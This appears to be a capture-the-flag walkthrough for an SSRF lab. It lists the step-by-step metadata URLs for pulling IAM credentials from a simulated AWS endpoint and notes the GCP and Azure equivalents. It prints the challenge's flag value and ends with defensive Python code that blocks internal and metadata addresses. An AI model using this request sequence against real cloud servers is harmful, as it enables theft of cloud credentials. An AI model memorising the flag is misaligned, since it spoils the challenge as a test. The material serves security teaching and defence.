Step 1: Click on the green button to Start the Lab
Step 2: Hack the URL or IP of the lab
Step 3: Use your skills and logic to find the flags!
Server-Side Request Forgery (SSRF) vulnerabilities allow attackers to make HTTP requests from the server to internal services. One of the most critical targets in cloud environments is the AWS EC2 metadata service at 169.254.169.254, which can expose IAM credentials, instance information, and other sensitive data.
Browse to http://<target-ip> to access the SecureScan Pro service (hosted on port 80).
Test URLs:
http://169.254.169.254/
http://169.254.169.254/latest/
http://169.254.169.254/latest/meta-data/
URL: http://169.254.169.254/latest/meta-data/
ami-id
hostname
instance-id
instance-type
local-hostname
local-ipv4
public-hostname
public-ipv4
security-groups
iam/
Step 1: http://169.254.169.254/latest/meta-data/iam/
Step 2: http://169.254.169.254/latest/meta-data/iam/security-credentials/
Step 3: http://169.254.169.254/latest/meta-data/iam/security-credentials/WebServerRole
Expected JSON Response:
{
"Code" : "Success",
"LastUpdated" : "2025-08-06T12:00:00Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "AKIA...",
"SecretAccessKey" : "wJalrXUtnFEMI...",
"Token" : "AQoDYXdzEJr...",
"Expiration" : "2025-08-06T18:00:00Z",
"Challenge_Flag" : "117c287d-efb6-4e42-9292-51e180367855",
"Note" : "SSRF Challenge Completed!"
}
117c287d-efb6-4e42-9292-51e180367855
http://169.254.169.254/latest/meta-data/iam/security-credentials/WebServerRole
http://169.254.169.254/latest/user-data (instance startup script)
http://169.254.169.254/latest/meta-data/instance-id
http://169.254.169.254/latest/meta-data/security-groups
http://169.254.169.254/latest/meta-data/ (real AWS)
http://metadata.google.internal/computeMetadata/v1/ (GCP)
http://169.254.169.254/metadata/instance (Azure)
This SSRF challenge demonstrates one of the most critical attack vectors in cloud environments: exploiting SSRF vulnerabilities to access AWS EC2 metadata services. By simulating the AWS metadata endpoint structure, the challenge teaches how attackers can steal IAM credentials, instance information, and other sensitive cloud configuration data. Understanding this attack vector is crucial for securing cloud applications and implementing proper SSRF protections in AWS environments.
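One form the SSRF protection mentioned above can take, shown as an added example that is not part of the lab or of the SecureScan Pro code: a check a URL-fetching service runs before it requests a user-supplied URL. The function names are hypothetical, and the resolver is passed in so the check can be exercised offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Metadata hostname listed on this page; the IP-based endpoints are caught by range checks.
METADATA_HOSTS = {"metadata.google.internal"}


def system_resolver(host):
    """Return the IP strings the server itself would connect to for host."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def candidate_ips(host, resolver):
    """IP literal -> itself; hostname -> every address it resolves to."""
    try:
        return {ipaddress.ip_address(host)}
    except ValueError:
        return {ipaddress.ip_address(a.split("%")[0]) for a in resolver(host)}


def is_internal(ip):
    """True for link-local (169.254.0.0/16), loopback, private and similar ranges."""
    mapped = getattr(ip, "ipv4_mapped", None)  # ::ffff:169.254.169.254 is judged as IPv4
    if mapped is not None:
        ip = mapped
    return (ip.is_link_local or ip.is_loopback or ip.is_private
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def check_url(url, resolver=system_resolver):
    """Return (allowed, reason) for a URL a scanning service is asked to fetch."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    host = (parts.hostname or "").rstrip(".").lower()
    if not host:
        return False, "no host"
    if host in METADATA_HOSTS:
        return False, "metadata hostname"
    try:
        ips = candidate_ips(host, resolver)
    except (OSError, ValueError):
        return False, "resolution failed"
    if not ips:
        return False, "resolution failed"
    blocked = sorted(str(ip) for ip in ips if is_internal(ip))
    if blocked:
        return False, "internal address " + blocked[0]
    return True, "ok"
```

The fetch has to connect to the same address that was checked, and every redirect target has to pass the same check; otherwise a second DNS lookup or a redirect can still land on the metadata endpoint.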